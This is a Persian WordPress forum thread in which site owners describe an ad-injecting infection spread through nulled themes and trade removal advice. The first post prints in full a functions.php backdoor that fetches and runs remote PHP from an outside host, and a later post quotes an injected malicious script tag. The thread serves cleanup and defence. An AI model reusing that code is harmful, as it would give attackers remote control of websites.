master89 1 ارسال شده در شهریور 96 گزارش بازنشر ارسال شده در شهریور 96 (ویرایش شده) دوستان سلام یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره. جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید! شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه. توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده. صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه. نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن) آموزش حذف ویروس : اول سایتتون رو اینجا وارد کنید و چک کنید https://sitecheck.sucuri.net/ حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید و قطعه کد زیر رو ازش حذف کنید if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته. (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده) سپاس ویرایش شده شهریور 96 توسط مهدی 1 نقل قول لینک به ارسال
samen 1 ارسال شده در شهریور 97 گزارش بازنشر ارسال شده در شهریور 97 سلام علیکم سایت ما هم به این مسئله دچار شده و متأسفاه روشی که فرمودین جواب نداد (این سایت ماست) اگه سورس قالب رو ملاحظه بفرمائید ظاهرا یک فایل جاوا اسکریپت هست که داره تبلیغات پاپ آپ میگیره و با آیدی ادمین سایت چیزی مشخص نیست فقط سایر کاربران می ببینند... اینم فایل مخرب که البته با فاصله می نویسم تا گوگل صفحه رو بلاک نکنه: <script src='h t t p s:// cdn. examhome. net/ cdn. j s ? v e r = 1 . 0 . 5 ' type='text/java s c r i p t'></script></p> نقل قول لینک به ارسال
mostafam6 0 ارسال شده در آذر 98 گزارش بازنشر ارسال شده در آذر 98 سلام دوستان من قالب انفولد دارم و و وقتی مطالب سایت و باز میکنم پاپ آپ سایتای مختلف مثل allow-space دات کام میاد بالا.تا الان چندبار کل فایلا رو پاک کردن و دوباره بک آپمو دیتابیس ریختم.با تمام آنتی ویروس ها هم چک کردم و هیچ مشکلی گزارش نمیشه.فایلهای فانکشن هم زیرو رو کردم کد نامربوطی پیدا نکردم.نمیدونم دیگه چیکار کنم.ممنون میشم اگه کسی بتونه راهنماییم کنه. نقل قول لینک به ارسال
Morteza 34190 ارسال شده در آذر 98 گزارش بازنشر ارسال شده در آذر 98 سلام به انجمن خوش اومدین دوست عزیز چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست. 1 نقل قول لینک به ارسال
یونس 0 ارسال شده در مرداد 99 گزارش بازنشر ارسال شده در مرداد 99 در در ۱۳۹۸/۹/۲۰ در 14:17، Morteza گفته است : سلام به انجمن خوش اومدین دوست عزیز چون نسخه اصلی رو نصب نکردید و نسخه نال شده و پر از ویروس روی سرورتون هست. نه اتفاقا من از قالب اصلی Divi استفاده می کنم و پلاگین نال شده ای هم نداشتم اما درگیر این مشکل شدم. چهار تا فایل آلوده رو هم از طریق اسکن سمت سرور پیدا و حذف کردم و همینطور امنیت سایت رو هم بالا بردم و فایل های وردپرس رو هم جایگزین کردم ولی باز به مشکل برخوردم. نقل قول لینک به ارسال
Morteza 34190 ارسال شده در مرداد 99 گزارش بازنشر ارسال شده در مرداد 99 نسخه اصل رو از کجا گرفتین؟ نقل قول لینک به ارسال
یونس 0 ارسال شده در مرداد 99 گزارش بازنشر ارسال شده در مرداد 99 از خود شرکت الگانت تم به صورت مستقیم خریداری کردم. نقل قول لینک به ارسال
yazdaniwp 1187 ارسال شده در مرداد 99 گزارش بازنشر ارسال شده در مرداد 99 در 7 ساعت قبل، یونس گفته است : از خود شرکت الگانت تم به صورت مستقیم خریداری کردم. سلام. لزوما همیشه از قالب نیست، قالبهای پرفروش هدف هکرها هستن، ممکنه افزونه نال شده داشتید و یا حتی یکی از افزونه ها باگ داشته یا بروز نبوده. کلا باید بصورت مداوم وردپرس رو بررسی کنید و آخرین اخبار رو هم از مراجعی مثل وبسایت رسمی وردفنس دنبال کنید. 2 نقل قول لینک به ارسال
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .